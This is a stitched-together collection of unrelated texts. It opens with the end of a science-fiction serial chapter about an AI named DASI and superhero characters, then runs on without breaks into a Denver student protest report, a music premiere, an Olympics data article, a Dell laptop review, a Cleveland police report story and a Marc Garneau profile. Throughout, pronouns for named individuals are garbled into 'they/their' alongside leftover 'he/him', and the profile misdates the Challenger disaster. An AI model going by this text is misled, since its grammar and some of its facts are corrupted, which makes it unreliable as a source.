DASI displayed a graph on the screen and summarized: "Unassisted, 3% chance. Internal assistance, likely from the Giggler, 4%. External assistance from another criminal organization, 9%. External assistance from a foreign government, 6%. External assistance from a current or former US government black program, with all electronic evidence either erased or never present, 78%.”
A new graph, and they continued. "External assistance is strongly correlated with the 91% probability they are currently working with the entities responsible for the viral assassination attempt against you, and is at least partly responsible for the dead ends Jumping Spider, Breakpoint, and I have encountered in investigating it.“
"And the chance that's the FSA, NIA or CBI?” asked Flicker softly.
“88%”
“That's too damned high,” said Journeyman.
“And not high enough,” said Flicker, looking up to watch as Yiskah ripped the arm off a bot with a screeching pop. "95% and I can go public, if DASI thinks it will help. And 99.7% is the threshold Doc and I agreed was enough to verify they've restarted the Lost Years war. That's when I start treating them like criminal organizations and taking out their infrastructure.“
Journeyman winced. "That could get nasty very quickly.”
“You know I can tear a building apart without killing anyone inside. It's the only way to get everyone out safely in a hurry. I did it to hundreds, saving people during the Japan quake. It is kind of tricky for hospitals, nursing homes, and things like refineries and nuclear power plants, though.”
They shrugged. "I don't think spooks and assassins would be able to function very well with no bases, records, vehicles, computers, gadgets, or guns. Especially not if DASI doxes all of them. But we don't have strong enough evidence.“
"I didn't mean physically.”
Flicker looked away. "Yeah. Which is why it's still probably best that Jumping Spider and Breakpoint go after Tabula Rasa, and the rest of us just help as needed. They'll be stopping by in a day or two. Although Jumping Spider did sound a little upset at Yiskah.“
Yiskah dodged under the grab of a lumbering bot and replied telepathically rather than waste breath on speech. "That's because one of their best leads dead-ended in the former head of the NIA mind control program. Who suffered a sudden case of exploded brain when I was about twenty seconds old.”
“You don't sound like you regret that,” said Journeyman.
“He was a vile torturer and war criminal, and Stella thought anything they knew that they didn't was about to become moot. They also didn't have a lot of time–I wasn't originally intended to be a permanent individual. So you should really ask them Though explaining the details to Jumping Spider might get interesting.”
“I have a question,” said Lif, who had been frowning at their handcomp. "About this maker of holes and gaps.“
"Tabula Rasa, you mean?” said Flicker.
“Yes. In what ways do they twist the threads around him? I fear I do not grasp that well, yet.”
“No one really does,” said Journeyman. "Mainly because they tended to wipe the memory of anyone else who saw them work. Doc figured out how to rig dampers to stop it, but they either broke or got turned off by whoever helped them escape.“
They waved a hand at the safety cameras watching over Yiskah's workout. "When Tabula Rasa was just walking around, they could avoid recognition by both people and sensors. When pressed, people might vaguely remember someone was there, but no details. And camera recordings glitch out, or loop an earlier interval without him–without raising an alarm. It's not known if they can extend that to someone else.
"He's really good at looking generic–if they wore a janitor's coverall or guard uniform while talking to someone, they never remembered anything else. And if they want to sweep away other evidence… they can actually remove memories, from a person or machine. You can see why a group trying to hide from DASI would find that handy.”
“Indeed. What limits this erasure?”
“It seems to require concentration and take longer if he's doing something extensive. And it requires them to be close to the target, which is how they finally got caught.”
“Oh?” said Lif.
Flicker snorted. "He tried it on Doc, apparently thinking they were safe because Doc wasn't holding a weapon. But Tabula Rasa didn't know just how violently Doc reacts to anyone trying to alter their mind. Doc took about 150 milliseconds to go from a memory discontinuity and seeing someone they didn't recognize to slamming Tabula Rasa's head into a steel doorframe hard enough to break their nose and give them a concussion. They didn't wake up again until they were already in the Box.“
"I somehow doubt he'll make that mistake again,” said Journeyman dryly.
Lif's eye's narrowed. "But they cannot hide their nature from me, now that I have their thread. Not even the Trickster could do that, only confuse trails by weaving through crowds.“ They smiled. "It has been some time since I have had a hunt that was a proper challenge. May I speak to your friends when they come?”
“Sure,” said Flicker. "But remember we want to capture them alive, if possible. He's obnoxious and evil, and he's probably helping whoever tried to kill me, but there's no evidence he's ever killed anyone himself. Which wouldn't mean much, except they don't need to. I can't think of anyone better at just disappearing. And Yiskah will probably want to mind probe them to find out what all he's done.“
"Hah.” The last bot had fallen, and Yiskah wiped sweat from their face. They walked over to join the rest of them. "I don't want to mind probe anyone. Probes range from unpleasant to hellish. And I'm not sure I could successfully mind probe Tabula Rasa without killing them or wrecking their mind, if they tried to use their power on me. It would be very hard to keep my mind trap from ripping into him.“
They looked bleak. "And I've seen enough of the consequences of that for a lifetime, just today. So they may get to keep a few secrets.”
“Not from me,” said Lif.
“Possibly not,” said Flicker. "But remember there are a lot more people to hide behind, here.“
They turned back to the display. "All right. I think we're done. We did everything we went to the Box to do, and we're forewarned about Tabula Rasa. And DASI's protocols should alert us if they try anything where she's watching.”
“Only if I am actively monitoring,” said DASI. "Much of my data comes from indirect sources, and tampering is possible. Tabula Rasa working for a black organization introduces a significant degree of uncertainty to intelligence and political analysis.“
"Yeah,” said Journeyman, “because you have to assign a prior to ‘Tabula Rasa is messing with us'. But they could have been doing that for the last three years. The only difference is that now we know.”
Flicker nodded. "So we're better off. It just doesn't feel much like it.“
*****
The meeting had started well, though it hadn't gone quite the way Doc had anticipated. They and Stella had verified their identities for the Grs'thnk Auditors, who were extremely picky about details during initial face-to-face meetings, and set up an interface for DASI, who clearly worried them. When the rest of the Lizards started asking questions, he'd been ready to handle the technical ones, expecting Stella to field everything political and social.
Instead, it had been the other way around–Stella was soon deeply engaged in about six simultaneous technical arguments about the captured Xelian ships, DASI, Black Swan, and identity segmentation, while Doc did their best to answer questions about Earth politics and economics.
They quickly discovered it was because DASI was answering almost every technical question they could have, and faster. Them answers went directly to the Grs'thnk equivalent of their Database, and then to individual Lizards' communication implants, without anything being visible or audible.
One thing he'd say for the Grs'thnk: They might seem to quibble endlessly, but those implants and long familiarity let them access data at least as efficiently as Doc could. So they could quibble quickly. And actually settle things in discussions that would be time-wasting quagmires in a meeting of humans. They hadn't asked any easy questions–just ones that were complicated, tricky, or they didn't have good answers for. Which was a refreshing change.
So of course they got interrupted by an emergency phone call from Earth. From the president of the European Reserve Bank.
Doc looked out the window of the secure communications room the Grs'thnk had thoughtfully provided as they listened. They were just admiring the wide view of Earth from orbit, but the window was actually functional; they could have used a tight-beam laser to communicate through it if they wished. But their normal phone was sufficient for this.
"No, I hadn't heard,” they said. "But it's pretty obvious–the trigger would be the talks breaking down. And twenty percent sounds about right, given the amount of damage the economic restrictions have caused. Generous, even. I'd try to convince the ICF to accept them offer.“
Barely restrained disbelief from the other end.
"You asked for my advice. They probably won't, this time. But you'll be on record as trying. So when–”
The bank president was not a stupid man. But he'd been surrounded by intellectual rigidity, the arrogance of wealth, and ideologically driven models for a long time, and it shaped their reactions.
“I doubt Black Swan really expects it to be accepted. She's making the offer to show good faith, and set a precedent. But if you turn their down, she'll make one to the Greeks, and you're screwed. Their new coalition will be a lot more receptive to someone who hasn't spent the last few years imposing policy requirements that actively made things worse.”
More protests.
“Of course they still have problems; but you are about to completely lose your leverage. If they default, you get nothing. And if Black Swan backs a new currency, you won't be able to credibly threaten to wreck their banking system if they don't cooperate. They're already desperate, and have a new government that doesn't view your demands as reasonable or legitimate.
"Any 'structural reforms' they require will be a lot less onerous–she has access to verification infrastructure that will help. So they might make enough progress for the first level of transition law compliance very quickly. And if they do that, and get even limited conversion rights to Earth Defense Union trade credits… they'll have better money than the euro.”
Skepticism.
“The EDU does not lack for either income or assets. Black Swan pays taxes, and even if you ignore the orbital infrastructure Stella and DASI have replaced, do you have any idea what the ships themselves are worth? The Grs'thnk are buying the two worst damaged surviving warships, because their navy really wants to get their hands on working current-generation Xelian military shields. They are paying the equivalent of over six trillion euros.”
Exasperation.
“I understand. I give you, personally, credit for trying to keep the train-wreck from getting worse. But the political motives driving the austerity measures have always been more about punishment than helping their economy recover. And the people who have been suffering from them the most aren't the ones that caused the problems, and they know it.
"So I wouldn't be at all surprised if they decide they'd rather trust Black Swan than you.”
*****
When Doc emerged, there were four Lizards waiting for them in the hallway. Three of them were Auditors, one from each team. The Auditors were an important part of the checks and balances in Grs'thnk political systems, and anything sufficiently important required three, from independent groups. They didn't participate, but they made sure everything got recorded securely, in three different places.
One of their functions was the Grs'thnk answer to the inherent tension between a culture of political openness and the need for candid private discussion. They put out definitive reports, and if a Grs'thnk politician wanted anything to remain secret for very long, all three Auditor groups had to agree to it–and they almost never did.
It was not the most efficient possible solution, but it had the advantage of robustness. Like many Grs'thnk traditions, their role had started as a solution to problems that had caused a great deal of political unpleasantness and at least one war.
The last Lizard was more interesting–he'd been at the initial meeting, but hadn't said much. He'd been introduced as Elder Trig'anth–Trig for short–and their title was 'Senior Opposition Observer', whatever that meant. Doc could believe the 'senior' part; they were the oldest looking Lizard Doc had ever seen.
They gave Doc a skeptical look. "Your claim about trying to stay out of politics isn't looking very credible. And you were evasive about some important topics. Your partner and the AI look like they're handling everything else just fine, so I've invoked my questioner privilege, and we're going to have a little private talk.“
"About what?”
“History, and a couple of wars that our models say your planet should have had, but didn't. I think you're the reason they didn't, and you're being evasive because you're worried the aid mission will set them off by sticking their snouts in the wrong place. I happen to be concerned about the same thing, which is why I thought sending this mission so damned fast was a mistake. 'First, do no harm' is I think how you'd put it.”
Doc raised an eyebrow. "Yeah, we do need to talk.“
Next: Chapter 21
Students from multiple Denver Public Schools walked out of class Friday afternoon to protest the election of Donald Trump.
Dozens of students were seen holding signs of Federal Boulevard. They stood on the side of the road in a line on the sidewalk.
DPS tweeted they were aware of the walkout and that district officials were working with police to monitor the students' safety.
“We respect our students' desire to express themselves, and schools are providing opportunities on campus for them to do so,” DPS tweeted. “We are encouraging students not to leave school, but to stay and participate in conversations with leaders at their campus.”
PHOTOS: DPS students walk out in Trump protest Dozens of students from multiple Denver Public Schools walked out of class Friday to protest President-Elect Donald Trump.
Parents with questions are asked to call the DPS Family and Community helpline at 720-423-3054.
There have been multiple protests in Denver since Trump was elected.
A large group of people gathered downtown Wednesday and Thursday night to protest the president-elect. Many carried signs and chanted anti-Trump slogans while marching down an impromptu route through the heart of the city.
Trump acknowledged the protests Thursday night, tweeting:
“Just had a very open and successful presidential election. Now professional protesters, incited by the media, are protesting. Unfair!”
Just had a very open and successful presidential election. Now professional protesters, incited by the media, are protesting. Very unfair! — Donald J. Trump (@realDonaldTrump) November 11, 2016
A few hours later, they changed course.
“Love the fact that the small groups of protesters last night have passion for our great country,” they tweeted. “We will all come together and be proud!”
Love the fact that the small groups of protesters last night have passion for our great country. We will all come together and be proud! — Donald J. Trump (@realDonaldTrump) November 11, 2016
Copyright 2016 KUSA
As the weather creeps ever closer to sweater season, it's nice to have a couple of new songs to warm your soul. El Paso's Khalid creates a tender story with "Location," which is premiering on The FADER today. Over a lot of soft guitar plucking, Khalid sings tenderly, I don't wanna fall in love off subtweets/ so let's get personal. The video has the singer stranded in their hometown desert, in search of their missing lover. The experience of shooting the video in their hometown, Khalid told The FADER over email, was an extremely important thing to him.
ADVERTISEMENT
"I have so much love for El Paso and being able to return home to shoot a music video there was incredible," they said. "In all honesty, I feel as if it was the first city that I've ever lived in that truly accepted my creativity. I'm excited to finally give back and show off where I came from."
Watch the video above.
Looking for news you can trust?
Subscribe to our free newsletters.
Update, 8/7/12: The most current data from the 2012 games has been added to the charts.
When all the medals from the 2012 Summer Olympics in London are tallied up, the top slots will likely be occupied by the usual suspects—the United States, China, and Russia. But what if we tried to measure countries' Olympic achievements without simply counting how many medals they bring home? What if we compared their athletes' performance against the size of their economies and populations?
That's what this interactive chart does. Click the play button at the bottom to see animated data starting in 1960. Hover over dots to see country names; click on a dot to turn on its label. (And scroll down to the bottom of this post for a customizable version.)
As you'll see in the chart above, looking at Olympic records this way produces some interesting results. For example, in the 2008 Beijing games, Jamaica only won 11 medals (or 32 medal points, if you assign 4 points to gold, 2 to silver, 1 to bronze). But it outperformed the big guns like the United States and China when it came to how many medal points it got relative to its developing economy and tiny population. While the US garnered 0.02 medal points per billion dollars of GDP and 0.8 medal points for every 1 million Americans, Jamaica picked up 2.2 medal points per billion dollars of GDP and 11.9 medal points for every 1 million Jamaicans. Not bad.
By this metric, other countries that outperformed the big medal winners in 2008 included the Bahamas, Cuba, Estonia, Kazakhstan, Kenya, Mongolia, and Zimbabwe.
This isn't necessarily a sign that these countries are up-and-coming athletic powerhouses. In some cases it simply means that they have a handful of world-class athletes and terrible economies (e.g. Ethiopia and Zimbabwe). Doing well in events that award a lot of medals also helps (e.g., Cuba and boxing and judo.) Other factors that may help countries' overall Olympic performance: Being a former member of the Soviet Bloc or a country with a planned economy, since they are more likely to aggressively recruit and train athletes. Being the host country also provides a bump (e.g. Mexico in 1968).
A few other trends and stories pop out when you look at the data between 1960 and 2008:
• The United States' performance relative to its population has remained pretty steady. But its performance relative to GDP has been dropping, due to economic growth. • After poor showings in the '60s and '70s, China has become a major Olympic contender. Its performance relative to GDP has fallen as its economy has grown, while its performance relative to its massive population has been increasing. • A big population can mean more medals, but it isn't necessarily an advantage; consider India, which has a dismal Olympic record. • A lot more countries, especially small and/or poor ones, are picking up medals. In 1960, the medals were gobbled up by big and/or rich countries. Those countries still do well, but the field is a lot more competitive now. (Note the appearance of more green and blue dots over time.) Poorer countries tend to perform better relative to their GDPs than rich ones. Wealthier countries tend to perform better relative to their population sizes than poor ones.
A few notes about the data: The chart only shows data for summer Olympic games. The economic data is incomplete for several countries, most notably Russia and other former Soviet Bloc countries; their GDPs and per capita GDPs are recorded as zero for many years. Though the data is in four-year increments, the chart automatically extrapolates the years in between games; it's pretty, but obviously no one won any medals in 2007 or 1961.
Other quirks in the data: West and East Germany fielded a single national team in 1960 and 1964. In 1992, Russia and 11 other former Soviet republics formed the Unified Team. That year, athletes from Yugoslavia and Macedonia competed as the Independent Olympic Participants. The United States and many other nations won no medals in 1980 since they boycotted the Moscow Olympics; likewise, Russia and several Soviet-aligned nations won no medals in 1984 when they boycotted the Los Angeles games.
Use the fully customizable chart below to further explore the data. Leave your findings and questions in the comments.
Dell kindly sent me a Precision 5520 to review for the Ubuntu Podcast. This post goes into detail about some things we couldn't fit in the show.
In the box
The box the laptop shipped in contained the laptop, the power supply (power brick and UK plug), and a Thunderbolt Ethernet dongle. The laptop itself was smartly presented in its own smaller padded box.
Hardware
The laptop itself has an attractive metal body with carbon fiber or something similar on the surface around the keyboard. A nice detail is that the underside of the body features a plate etched with the model number, which flips over to show the normal regulation compliance emblems hidden underneath.
Ports
On the left, the device has the charging port (straight barrel connector), HDMI, 1 USB-A 3.0 port, a 3.5mm combined headphone/microphone jack, and 1 USB-C/Thunderbolt port. On the right, there is another USB-A 3.0 and anSD card slot. This side also features an Kensington lock port and a battery indicator. Both of the USB-A ports support power sharing.
I tried plugging a pair of stereo headphones into the 3.5mm jack. While audio played, the volume was noticeably lower in the left ear. As there's only 2 USB-A ports, I plugged in a mouse, keyboard and Ethernet dongle using a bus-powered USB hub. Unfortunately, devices kept dropping out on the hub. I switched to using the supplied Ethernet dongle and plugging in the mouse and keyboard directly, which worked without an issue.
While there aren't a huge number of ports available on the body of the device, there are docking options available. A USB-C dock is available with extra USB ports, ethernet, audio output, and ports to drive 2 monitors. There's also a Thunderbolt dock available with the similar ports, but the ability to drive 3 monitors. I didn't receive a dock with my review unit.
Specification
My review unit featured the top options for most of the hardware. This specification retails for around £2,618 on the Dell website, while the base specification retails for around £1,649.
Intel Xeon Quad-core 3GHz CPU (base Core i5, 2.5GHz)
32GB DDR4 RAM (base 8GB)
UHD (3840×2160) 15.6″ touch screen (base FHD (1920×1080), non-touch)
Intel WiFi 802.11ac/Bluetooth (standard)
512GB SSD (base 500GB HDD)
NVIDIA Quadro M1200 w/4GB GDDR5 GPU (standard)
6-cell 97Wh battery (base 3-cell 56Wh)
Input/Output
I found the keyboard satisfying to type on. The keys take a decent amount of force to get moving, and go down soothly with no sponginess. The Super key is printed with a Windows logo, no vinyl sticker like Entroware, and no custom-printed keycap like Tuxedo. The model I was sent had a US-layout keyboard, although the Dell UK site offers a UK keyboard as standard. The keyboard lacks some keys such as Scroll Lock and Pause, which is an understandable omission but is slightly irksome for me as I use Pause as the summon key for Tilda.
The touchpad is big and soft to the touch, with just the right amount of friction. It supports multi-touch, supports clicking down anywhere for the primary button, and clicking the bottom-right area for secondary click. By default, it's configured to use “natural” scrolling, which matches the scroll behaviour of the touchscreen.
The screen fills the space inside the lid with only about a 2cm bezel all the way around. The light from the screen is incredibly bright, so much so that I found it uncomfortable to look at a white page on full brightness. It can be adjusted to a range of levels so it's not hard to find a comfortable setting. The screen is readable in direct sunlight, although it has a glossy finish so is quite reflective when there is a dark background. The touch screen works well, although only supports single touch, and picks up finger prints easily.
This was my first experience of a HiDPI screen. The picture is very sharp and good quality, but doesn't offer a particular advantage over an FHD screen for general use. The place where it really makes a difference is with high-resolution photos and videos, which reveal a huge amount of detail not visible on lower DPI screens.
Software
First boot
The laptop came loaded with Ubuntu 16.04 LTS. On first boot in launched into the OEM setup, which allows you to connect to WiFi, create a user, configure the locale, and create a recovery USB stick. It finishes by installing updates, then reboots for you to log in to your new user. This all went as expected, and the WiFi connected without a problem after reboot, something I've had issues with before.
In the interests of full disclosure, at this point I should mention that this was the second unit I had to review. The first unit I was sent has a bug in the OEM setup which caused it to crash. The error messages weren't very friendly, and it left me unable to set up the machine. Dell sent me a replacement unit, which worked without a problem.
Upon reboot, the LightDM login automatically scales to take the HiDPI screen into account. However, after login, the Unity desktop wasn't automatically scaled. For usability, I adjusted the UI scale to 2x in the Screen Display settings, which gave me the equivalent screen estate of an FHD screen.
One serious letdown about the initial setup is that the Super key is disabled by default, and no key has been configured to replace it for usage with Unity. This means that upon first boot, the list of Unity keyboard shortcuts is missing a lot of key features around the Dash, Launcher and window management. There's an article on Dell's help website which explains how to re-enable the key, but as someone who makes heavy use of Unity's keyboard shortcuts, I don't feel like this represents a good default Ubuntu experience.
Default software
The initial package selection differs from vanilla Ubuntu 16.04. There's a Dell-specific APT repository enabled that's hosted by Canonical, and several hardware drivers installed, ensuring that all the hardware works as intended.
Something about the default package selection which confuses me somewhat is the choice of web browsers. Instead of Ubuntu's default Firefox, you get Chrome and Chromium, which both have icons at the top of the Launcher. As standard with Ubuntu 16.04, The QML Browser app is also installed and available from the Dash, and the Amazon icon in the Launcher uses this, which adds an additional inconsistency since this browser doesn't pick up the UI scaling.
The rest of the installed apps are pretty much standard, with the addition of Dell utilities for installing drivers and creating recovery media.
Experience
Graphics
As mentioned above, the laptop features a dedicated Nvidia graphics card. I ran the Superposition benchmark at various settings, although the only preset that provided a reasonably smooth experience was 720p Low, scoring 1930. I also installed Tomb Raider through Steam (only usable in Big Picture mode due to the desktop UI not scaling) and ran the benchmark there. On 720p/Ultimate settings, it managed an average of 51 FPS. On 1080p/Ultimate settings, it still managed a respectable 33 FPS. Unfortunately, at native resolution, it only managed 9 FPS on average.
When the graphics are being exercised, the fan kicks into gear to an extent that is hard to ignore. The noise isn't at an irritating pitch, but it's clearly audible over the sounds of the game.
Battery endurance
I tested the battery endurance with each GPU by setting the screen brightness to minimum (still perfectly usable), the keyboard light off, the Wifi connected, and left it untouched to discharge.
With the Nvidia GPU, the 97Wh battery lasted 6:30. With the Intel GPU, it lasted about 11 hours.
I also tested the standby, which went for 18 hours with 8% battery drain. Notably, when recharging, the top-left quadrant of the laptop's body gets very hot.
Verdict
The Precision 5520 is a great looking laptop on the outside, with a fantastic screen and innards to match. It's marketed as a “mobile workstation” and definitely fits into that role, offering an excellent option for upgrade from a class of machine such as a Macbook Pro. The price point is above what most would consider for a personal device, but offers a good range of options for a professional purchase. Personally, I would stick with the FHD non-touch screen, as the UI scaling still has some gaps, and the single-point touch screen doesn't offer much attraction given the very nice touchpad.
As an experienced Ubuntu user, I'd be very happy to have this device as my daily driver, as I'm confident that I could customise it to my preferences. I would however have some reservations about recommending it to a first-time Ubuntu user, as I'd fear some of the changes from vanilla Ubuntu would create a confusing experience.
U.S. Attorney General Eric Holder said Thursday that the Cleveland police department systematically engages in excessive use of force against civilians, and that a court-appointed monitor will now oversee implementation of reforms. (Reuters)
U.S. Attorney General Eric Holder said Thursday that the Cleveland police department systematically engages in excessive use of force against civilians, and that a court-appointed monitor will now oversee implementation of reforms. (Reuters)
The Obama administration on Thursday issued a report accusing the Cleveland police department of using excessive and deadly force against citizens in violation of their constitutional rights, the latest development in a growing national debate over the fairness of local police tactics, especially in minority communities.
According to the Justice Department report, Cleveland police engaged in a “pattern or practice” of unnecessary force — including shooting residents, striking them in the head and spraying them with chemicals. The Justice Department and the city agreed to establish an independent monitor to oversee changes in the police department, including better training and supervision of officers. And the Justice Department urged Cleveland civic leaders to hold police accountable for their improper actions when necessary.
Attorney General Eric H. Holder Jr. traveled to Cleveland to announce the measures in person. They set them against the backdrop of the recent deaths of three African Americans at the hands of police, including last month's fatal shooting of 12-year-old Tamir Rice in Cleveland. Holder's announcement came a day after a New York grand jury declined to bring charges in the death of Eric Garner, a 43-year-old African American man who died in July after police placed them in an apparent chokehold during an arrest.
“In recent days, millions of people throughout the nation have come together — bound by grief and anguish — in response to the tragic deaths of Michael Brown in Ferguson, Missouri, and Eric Garner in New York City,” Holder said at a news conference. “The tragic losses of these and far too many other Americans . . . have raised urgent national questions. And they have sparked an important conversation about the sense of trust that must exist between law enforcement and the communities they serve and protect.''
Holder spoke amid growing public anger over the decision that no criminal charges will be filed against the officer in the Garner case — on the heels of another grand jury's decision not to charge white Ferguson police officer Darren Wilson in Brown's death. Both decisions triggered nationwide protests.
From the halls of Congress to the streets of New York City, demonstrators, Democratic politicians and some prominent conservatives called for a rethinking of police and prosecutorial tactics and firmer guidelines in determining when officers can use deadly force against citizens.
“The way we go about policing has to change,” New York City Mayor Bill de Blasio said as they announced a wholesale retraining of more than 20,000 officers, including a three-day course in how to handle confrontations on the street. “People need to know that black lives and brown lives matter as much as white lives,” added de Blasio, who campaigned in part on reforming police tactics that they said had unfairly targeted minorities.
Protests over the criminal-justice response to the deaths of Garner, Brown and others continued in downtown Washington on Thursday, with several hundred demonstrators gathered in front of the Justice Department. There were also protests in Boston, Chicago and New York.
The department said this week it will investigate Garner's death, and it is probing Brown's killing.
The escalating developments reflect a decades-old history of tension between police and the communities they serve, especially those in minority areas, experts in policing said. Nearly a half-century after the Kerner Commission investigating the devastating urban riots of the 1960s warned that the nation “is moving toward two societies, one black, one white — separate and unequal,” mistrust of law enforcement remains widespread in some communities, they said.
Law enforcement strategies that affect police-community relations can vary widely by state and locality, from the community policing model popularized in the 1980s and '90s — in which officers walked the beat in neighborhoods and worked with local leaders — to the tougher, more intelligence-based approach that gained favor after the Sept. 11, 2001, attacks.
Tensions have exploded at times, such as during the 1992 Los Angeles riots that followed the acquittal of white police officers on trial over the videotaped beating of Rodney King, a black man. Five years later, New York City police beat and sodomized Haitian immigrant named Abner Louima with a broken-off broom handle, a case in which Loretta E. Lynch, now nominated to succeed Holder as attorney general, was the senior prosecutor.
1 of 55 Full Screen Autoplay Close Dec. 5, 2014 Dec. 4, 2014 Dec. 3, 2014 Skip Ad × Protests erupt across U.S. after grand jury declines to indict N.Y. officer View Photos Protesters took to the streets across the country after a Staten Island grand jury declined to bring charges in the case of Eric Garner. Garner, an African American, died this past summer after a white New York police officer placed them in an apparent chokehold during an arrest. Caption A Staten Island grand jury declined to bring charges in the case of Eric Garner, who died this summer. Dec. 5, 2014 Protesters participate in a 'Die-In' at New York's Grand Central Station during a march for Eric Garner. Protesters in New York and other cities staged a fourth night of rallies on Saturday, denouncing use of deadly force by police against minorities. Andrew Kelly/Reuters Buy Photo Wait 1 second to continue.
Today, even though police-community relations “are a lot better than they were 20 years ago,” the recent police-involved killings revealed new fault lines, said David H. Harris, a law professor at the University of Pittsburgh and an expert on police practices. “If anyone thought we were out of that era in which some groups feel the law and policing are not applied equally to them, clearly we are not,'' they said.
Much of the recent tension has been in New York City, where Rudolph W. Giuliani (R), as mayor in the 1990s, famously implemented what is known as the “broken windows” philosophy of policing. That approach involved zeroing in on small crimes, such as breaking windows or jumping subway turnstiles, to deter larger ones.
Their successor, Michael R. Bloomberg (I), became known for “stop-and-frisk,” in which police stopped virtually anyone deemed suspicious, and crime rates fell for years in the city, as they have nationwide. A federal judge ruled last year that the policy discriminated against blacks and Hispanics, and de Blasio has embraced changes, touting statistics showing that stop-and-frisks are substantially down this year.
But Garner died after a confrontation with police over the unlawful sale of individual cigarettes, the kind of minor offense that has been the focus of the department's approach for years. “We're dealing with a kind of continuing legacy of the Giuliani and Bloomberg years,'' said Harris, who added that the eight-year officer who put Garner in an apparent chokehold, Daniel Pantaleo, probably based their actions on “the standards and training they learned” when they joined the force.
The Justice Department report released in Cleveland on Thursday cited a series of examples of what the department called “unreasonable and unnecessary” use of police force. In one incident, the report said, 13 Cleveland police officers fired 137 shots at a car, killing both of its occupants.
In another, it said, an officer used a stun gun on “a suicidal, deaf man who committed no crime, posed minimal risk to officers and may not have understood officers' commands.”
Officers were also accused of repeatedly punching a handcuffed 13-year-old boy in the face. They were already under arrest for shoplifting.
“Accountability and legitimacy are essential for communities to trust their police departments and for there to be genuine collaboration between police and the citizens they serve,” said Holder, who voiced optimism that “meaningful change is possible” in Cleveland.
They said the department's Civil Rights Division has opened in the past five years more than 20 similar investigations into police departments nationwide, more than twice as many as were begun in the half-decade before that.
Alice Crites contributed to this report.
Being Canada's first astronaut doesn't seem like a fact pulled from the biography of a dull man. Yet Marc Garneau—arguably the Liberal leadership candidate with the clearest shot at catching up to prohibitive front-runner Justin Trudeau—acknowledges that their past NASA exploits haven't prevented a rather earthbound image of them from taking hold. He's often viewed less than an exciting spaceman than as a dry critic of the government's technology and industry policy. “I think to some extent people view me in a stereotypical way,” they say of the science and engineering credentials they brought into politics. “I would like them to know me more as a complete person.”
To that end, Garneau urged Liberals, at the close of the party's first leadership debate last Sunday in Vancouver, to consider everything he's ever done. “Leadership is the product of your life experience,” they said. “It's what you've accomplished.” Garneau has been a naval officer, an astronaut of course, president of the Canadian Space Agency and now a Montreal MP. If they didn't mention Trudeau's path to the front of the leadership pack—famous son of a prime minister, schoolteacher and then also a Montreal MP—the implicit comparison was hard to miss.
But as Garneau claims an experience edge, Trudeau argues that the next Liberal leader's real job is grabbing the attention of voters, their own obvious forte. “We have to get out and connect with Canadians,” they said in Vancouver. And for a third-place party, the need to stir enthusiasm is undeniable. That leaves Garneau with the task of not just reminding Liberals of their impressive past, but also getting them to rethink how they perform now. Even they admit that their style as a novice in the House of Commons, after first winning their Westmount-Ville-Marie riding in the 2008 election, was often “wooden.” But they contend that he's picked up their political game since the 2011 election, and will prove it before the party's April 14 leadership vote.
In an era when political strategists routinely advise candidates to present a compelling personal narrative, Garneau has plenty of material to work with. They were born in 1949 and raised in a bilingual military family. Their father, André Garneau, served in the Second World War, stayed on as a career officer, and retired a brigadier general. Marc's younger brother, Toronto advertising executive Philippe Garneau, remembers their father instilling a sense of family honour. “He used to say to us, ‘Oh, you're going to this party? Remember—you're a Garneau.' ” Philippe says Marc carried that “no private moments” ethos of representing family into their acute awareness that they stood for Canada, first as a naval officer and then under the spotlight as the country's first astronaut.
A military career, Marc Garneau says, always felt like the natural direction for him. But from an early age they decided they wouldn't be an infantry officer like their father. While crossing the Atlantic twice on passenger ships as a boy, Garneau says they “fell in love with the sea.” That romantic reaction wasn't out of character. They were drawn early to art and literature, concentrating on belles lettres, rather than science and math, in Quebec's old classical school system. Still, when they were deciding on a degree to pursue, they opted to study engineering. “Curiosity is a big factor in my life,” they say. “I wanted to understand things.”
At only 16 they entered military college in Saint-Jean, Que., where the discipline was more than tough. “It was,” they recall, “the old way of breaking you down before building you up again.” They started many days running laps as punishment for minor infractions. They graduated as an engineer from Canada's Royal Military College in 1970, then attended the Imperial College of Science and Technology in London on a scholarship, earning a doctorate in electrical engineering in 1973. They went on to serve in the Canadian navy until 1983 as an expert on the combat systems on ships.
They were working at defence headquarters in Ottawa in 1983 when they saw what they describe as “an innocuous little ad” in their morning paper. The Canadian government was recruiting astronauts to fly in the U.S. space shuttle. Growing up Canadian, Garneau says the possibility had never occurred to him—astronauts were American. When the chance suddenly appeared, they didn't hesitate. “I thought I'd never get chosen but if I didn't put my name in I'd never know.” They made the cut, not only because they were fit and suitably trained, but also by demonstrating that they could handle the inevitable media attention. They flew three missions, in 1984, 1996 and 2000.
Along the way, they mourned the deaths of friends and comrades in the disasters of the 1983 Challenger takeoff and the 2003 Columbia re-entry. They were also the first non-American chosen for the unique roll of CAPCOM, short for “capsule communicator,” the unflappable voice of Houston mission control heard by astronauts in space. “If the frickin' spaceship's falling apart,” Garneau says, “they want to know you are calm, reassuring: ‘You are going to get out of this.' ”
But could the right voice for mission control make itself heard in the din of politics? From as early as 1988, Liberals had been feeling out Garneau, an obvious catch as Canada's homegrown space hero, about any possible aspirations for elected office. They were interested, but went first to the Canadian Space Agency, serving as its president from 2001 to 2005. These days, they mention managing the agency's staff of 700 and yearly budget of $300 million far more often than they talk of leaving the Earth's atmosphere. The job provided, they say, an insider education on how Ottawa works.
In 2006, they ran and lost in a Montreal seat, as the sponsorship scandal decimated the Liberals across Quebec. They blame their own inexperience as a candidate, too. “I learned a lot, but I came out of it saying, ‘I'm in this for good,' ” they say. “I don't like to lose.” They won in their current riding in 2008, and held the seat in 2011—but only barely. In fact, they conceded defeat on election night, only to be roused by a call from their campaign manager at home at 2:30 a.m., telling them he'd won on the strength of late polling station returns. “I went out and danced in the street,” they say. “Literally. I was so happy.”
Exuberance of that sort isn't much associated with Garneau. Their political persona has evolved, though, from blandly stolid to, at times, almost fiercely intense. Supporters say their seriousness has the potential to attract votes as much as, say, another candidate's charisma. “Some people want an exciting leader,” says Ontario MP Ted Hsu, one of three Liberal caucus members supporting Garneau so far. “But I think a lot of Canadians want a steady hand they can trust to make decisions.” Hsu adds, “I don't think Stephen Harper is particularly exciting either.”
Since announcing their leadership bid last November, Garneau has proposed a fair amount of policy. On the economy, their platform includes eliminating capital gains tax for start-up firms and cutting taxes for companies that offer workplace training. They call for dramatic reform of federal elections with a preferential ballot, on which voters would rank candidates instead of picking just one.
